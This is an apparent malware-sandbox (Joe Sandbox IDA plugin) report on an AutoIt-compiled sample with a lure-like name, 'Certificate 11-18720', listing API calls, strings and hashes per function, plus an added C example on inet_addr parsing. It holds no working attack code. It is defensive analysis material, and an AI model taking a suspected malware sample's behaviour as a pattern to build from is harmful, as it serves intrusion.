                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: f1ee6f579a8b5aee6b5e2689a5b501e1253e776af17b352dc9af70d49abdc1fb
                                                                                    • Instruction ID: 866b39001700fc9438024627b1f2bfb782b4b832e1740920445d03f5c14db16d
                                                                                    • Opcode Fuzzy Hash: f1ee6f579a8b5aee6b5e2689a5b501e1253e776af17b352dc9af70d49abdc1fb
                                                                                    • Instruction Fuzzy Hash: FC11CA72910209AFDB04DFB8CC45AEA7BB9FB48314F044629F945D3240E730E850CB20
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00629699
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006296A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: 798fe4f1946d5e7a6bc8ae2819a38fba2991c30854e915d2ee8f84a44ae4ca57
                                                                                    • Instruction ID: 278da2e3c3aaef1ba030bf24675fc4db7e4efb94c3a352623bcb6d6c4388bbd8
                                                                                    • Opcode Fuzzy Hash: 798fe4f1946d5e7a6bc8ae2819a38fba2991c30854e915d2ee8f84a44ae4ca57
                                                                                    • Instruction Fuzzy Hash: 5B119A71500518AAFB205FA4EC44AEB3BABEB85368F104324F965932E0C7319C519B60
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006052D5
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006052F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: fb8c52d15e53a96c265193482fca8eabd0b15ad23b5ceb55b349f38b7616bc76
                                                                                    • Instruction ID: 5abb09ad60125c767b481cb6ef3ed321e046fe9aaace1fc6f0a82a4520707c35
                                                                                    • Opcode Fuzzy Hash: fb8c52d15e53a96c265193482fca8eabd0b15ad23b5ceb55b349f38b7616bc76
                                                                                    • Instruction Fuzzy Hash: 0F110371941614ABDB1CDA98C905BDF77BAAB06350F041116E843A72D0E3B0AE01CF90
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00614DF5
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00614E1E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: a8bb937602cefd9016c05abe8d370f185f99b1a6090e4d989ca3bedf898cd44c
                                                                                    • Instruction ID: 782c1495e00b85a42eb8fa1bd823bdde93587e06e1cbf08691e1990558147f85
                                                                                    • Opcode Fuzzy Hash: a8bb937602cefd9016c05abe8d370f185f99b1a6090e4d989ca3bedf898cd44c
                                                                                    • Instruction Fuzzy Hash: 0F11A070A01221BBDF258F61D888EFBFAAAFF06755F14822AF50597240DB705981C6E0
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005F37A7
                                                                                    • ___raise_securityfailure.LIBCMT ref: 005F388E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: (h
                                                                                    • API String ID: 3761405300-1071143277
                                                                                    • Opcode ID: d2cc89a0946d00c8943181ce6d67c3b9c5c40ba0f31e71e92d581ac61def206a
                                                                                    • Instruction ID: 0eca18bb4d8c18fb438f9b872bfaad39df335a8485a11e28d3db293b0258835d
                                                                                    • Opcode Fuzzy Hash: d2cc89a0946d00c8943181ce6d67c3b9c5c40ba0f31e71e92d581ac61def206a
                                                                                    • Instruction Fuzzy Hash: AC21E4B5501304EAF794DF55E9896163BB6FF4C310F11AE2AE508863B1E3B46988CB45
                                                                                    APIs
                                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
                                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0061A88B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 3832099526-2422070025
                                                                                    • Opcode ID: e3cf6211ad6a69a7eb532a732b0bf6887cceb385f7fbafb4d7fc7016b285f855
                                                                                    • Instruction ID: c611eb79c6e933ad902dd0e60ba9b843d045783c72878cccfdfe62332d81fa5a
                                                                                    • Opcode Fuzzy Hash: e3cf6211ad6a69a7eb532a732b0bf6887cceb385f7fbafb4d7fc7016b285f855
                                                                                    • Instruction Fuzzy Hash: 04012238200305ABCB209FE8C88AFE9B766FF45320F14842AF5169B3D1CB31E8428756
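The function record above pairs inet_addr and htons with the literal 255.255.255.255. The usual reason that literal appears next to inet_addr is a documented WinSock/POSIX quirk: inet_addr returns INADDR_NONE (0xFFFFFFFF) on a parse failure, but the valid limited-broadcast address 255.255.255.255 encodes to exactly the same value, so a caller that only tests for INADDR_NONE cannot tell the two apart and must compare the input string. That reading is an inference from the record, not something the report states. The following is an added example written for this page (not code from the sample or from Joe Sandbox) showing the naive check beside the disambiguated one; it uses the POSIX headers, but inet_addr and htons behave the same way under winsock2.h.

```c
#include <arpa/inet.h>    /* inet_addr, htons, htonl (POSIX); winsock2.h on Windows */
#include <netinet/in.h>   /* INADDR_NONE */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Naive form: treats every INADDR_NONE result as a parse failure, which
   wrongly rejects the legitimate broadcast address 255.255.255.255. */
int naive_ipv4(const char *host, uint32_t *addr_be)
{
    if (host == NULL || addr_be == NULL) return 0;
    uint32_t a = inet_addr(host);
    if (a == INADDR_NONE) return 0;
    *addr_be = a;
    return 1;
}

/* Disambiguated form: INADDR_NONE is only a failure when the input was not
   the one string that legitimately encodes to 0xFFFFFFFF. On success the
   address and port are returned in network byte order, ready for sockaddr_in. */
int ipv4_endpoint(const char *host, uint16_t port, uint32_t *addr_be, uint16_t *port_be)
{
    if (host == NULL || addr_be == NULL || port_be == NULL) return 0;
    uint32_t a = inet_addr(host);
    if (a == INADDR_NONE && strcmp(host, "255.255.255.255") != 0)
        return 0;  /* genuine parse failure: not dotted-quad, needs name resolution */
    *addr_be = a;
    *port_be = htons(port);
    return 1;
}

int main(void)
{
    /* Constructed inputs for illustration. */
    const char *inputs[] = { "127.0.0.1", "255.255.255.255", "not.an.ip" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        uint32_t a = 0; uint16_t p = 0;
        int naive = naive_ipv4(inputs[i], &a);
        int fixed = ipv4_endpoint(inputs[i], 443, &a, &p);
        printf("%-16s naive=%d fixed=%d addr=0x%08x port_be=0x%04x\n",
               inputs[i], naive, fixed, fixed ? ntohl(a) : 0, p);
    }
    return 0;
}
```

The only input on which the two functions disagree is the broadcast address; for an analyst, seeing that string next to inet_addr is therefore a hint that the code is a generic address-resolution helper (AutoIt's runtime contains one) rather than anything specific to the payload.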
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005FB7EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 536e38908e3974c78eceb7cb306486705a014453517360c770cf3c4f37e39576
                                                                                    • Instruction ID: e0b4b1f2f82e44d41b70ca4038863ddbf262e93d99396ea8a84a3fc980673afd
                                                                                    • Opcode Fuzzy Hash: 536e38908e3974c78eceb7cb306486705a014453517360c770cf3c4f37e39576
                                                                                    • Instruction Fuzzy Hash: 1C01DE7160111AAFDB04EBA4CC56EFE3B6ABF86350B04061CF562672C2EF64580887A0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 005FB6EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: a60e01053820e5ccae08a6eaadd189f66ad5a89f2e033993260e0a44411a15d7
                                                                                    • Instruction ID: f8c68acd68357f8b74451ab7c8d4fa8167b43d567d006715c50ac75ada584bf9
                                                                                    • Opcode Fuzzy Hash: a60e01053820e5ccae08a6eaadd189f66ad5a89f2e033993260e0a44411a15d7
                                                                                    • Instruction Fuzzy Hash: AA01DFB164000AAFDB04EBE4C956FFE3BB9AB46344F10001CF606A3282EF585E0887B5
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 005FB76C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: e3194b4f0e2ceade075cc3fadfa51627c8d1c7a6e679895ff4170cda29b29987
                                                                                    • Instruction ID: b06c98e3804d5cad26b89dd9bca8168515448c33c04c9c06f2126fb965784951
                                                                                    • Opcode Fuzzy Hash: e3194b4f0e2ceade075cc3fadfa51627c8d1c7a6e679895ff4170cda29b29987
                                                                                    • Instruction Fuzzy Hash: 7901F2B564100AEBDB00F7E4C916FFE7BADAB46304F540019B505B3192DB685E0887B1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __calloc_crt
                                                                                    • String ID: "h
                                                                                    • API String ID: 3494438863-15350742
                                                                                    • Opcode ID: d984063aaffbd554b61210b806202e7f4aff09420f431973d99ec13f0e761e1b
                                                                                    • Instruction ID: 2b2acad038a96ef5394b697f26da78b3a0db9169c82f946b21fed98a469df40b
                                                                                    • Opcode Fuzzy Hash: d984063aaffbd554b61210b806202e7f4aff09420f431973d99ec13f0e761e1b
                                                                                    • Instruction Fuzzy Hash: 82F04670208243AAE32C8F1BBD7066A6FD6F780B70F104A1BF201CE285E770C9818F94
                                                                                    APIs
                                                                                    • LoadImageW.USER32(005C0000,00000063,00000001,00000010,00000010,00000000), ref: 005C4048
                                                                                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,006067E9,00000063,00000000,75C10280,?,?,005C3EE1,?,?,000000FF), ref: 006341B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumImageLoadNamesResource
                                                                                    • String ID: >\
                                                                                    • API String ID: 1578290342-3341390398
                                                                                    • Opcode ID: d883150cd8e388a455cc001463369f041e65687a3418e0c44cec5c3bd148e1b1
                                                                                    • Instruction ID: 01b83a24712819ff56a780d13c8be3dc423c46136e48e69e5e9853e8bbf80e12
                                                                                    • Opcode Fuzzy Hash: d883150cd8e388a455cc001463369f041e65687a3418e0c44cec5c3bd148e1b1
                                                                                    • Instruction Fuzzy Hash: 76F06D35680310BBE3204B1AAC4AFD23EAEE706BB5F10160AF324AE1D0D6E090919B94
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: c4bac76f50727071b30206058622d2d748ef429ac72bb4ea800edcee70dcbb72
                                                                                    • Instruction ID: 0dffc03661045d220746b317fe212830a49b1073659104ad8940f24b1edd2a10
                                                                                    • Opcode Fuzzy Hash: c4bac76f50727071b30206058622d2d748ef429ac72bb4ea800edcee70dcbb72
                                                                                    • Instruction Fuzzy Hash: 8BE0D877A0433527D720EAA5DC09ECBFFADEB91B60F010116F945D3181D670E60187D4
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005FA63F
                                                                                      • Part of subcall function 005E13F1: _doexit.LIBCMT ref: 005E13FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 94fd40dfb65a69e0c6119e05805ac2ff35fc71be64349e5b6334b461ed29df54
                                                                                    • Instruction ID: e9867f147ec5310af0ada49b85184f73041d972e0f5c5dba9cc96be431c74307
                                                                                    • Opcode Fuzzy Hash: 94fd40dfb65a69e0c6119e05805ac2ff35fc71be64349e5b6334b461ed29df54
                                                                                    • Instruction Fuzzy Hash: 32D02B313C032933C3243AE97C1FFC47D4DAB49B51F050416BB0C956C349E2958002DD
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0063ACC0
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0063AEBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 510247158-3257408948
                                                                                    • Opcode ID: c7f90157197f1d318d43ca59a19057732759d144572cb1177ff4e8cbd7f327f5
                                                                                    • Instruction ID: 4ab9d375f6513642ce0e5bdc9af249434f36ce3e46dbedc2274ce498af6f810e
                                                                                    • Opcode Fuzzy Hash: c7f90157197f1d318d43ca59a19057732759d144572cb1177ff4e8cbd7f327f5
                                                                                    • Instruction Fuzzy Hash: BFE06D70C00109EFCB11DBE8D9849ECB7BAAB48300F14A086E582B2260CB704A85EF22
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006286E2
                                                                                    • PostMessageW.USER32(00000000), ref: 006286E9
                                                                                      • Part of subcall function 00607A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 1af248051e2db4639ad4bd344bd6557845ad185fcbfc685a105613c24029765b
                                                                                    • Instruction ID: 0f15c13aa5e8de1c6c2fee9e039a30a06ed81e1c776fc45c93380e69e331a64d
                                                                                    • Opcode Fuzzy Hash: 1af248051e2db4639ad4bd344bd6557845ad185fcbfc685a105613c24029765b
                                                                                    • Instruction Fuzzy Hash: C4D0C935BC53247BF3686770AC0BFC66A1A9B05B11F111819B649AA1D0C9A4A9408658
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006286A2
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006286B5
                                                                                      • Part of subcall function 00607A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: d846d55718b5ee35399d22c12e77cc16806333196518cf3c9a76876309e14005
                                                                                    • Instruction ID: 2d52b68c4aa32d3bb8f4e8acdc43ab05814490c23370bd2b74ada212236bd405
                                                                                    • Opcode Fuzzy Hash: d846d55718b5ee35399d22c12e77cc16806333196518cf3c9a76876309e14005
                                                                                    • Instruction Fuzzy Hash: 82D0C935B84324B7F3686770AC0BFC66A1A9B05B11F111819B649AA1D0C9A4A9408654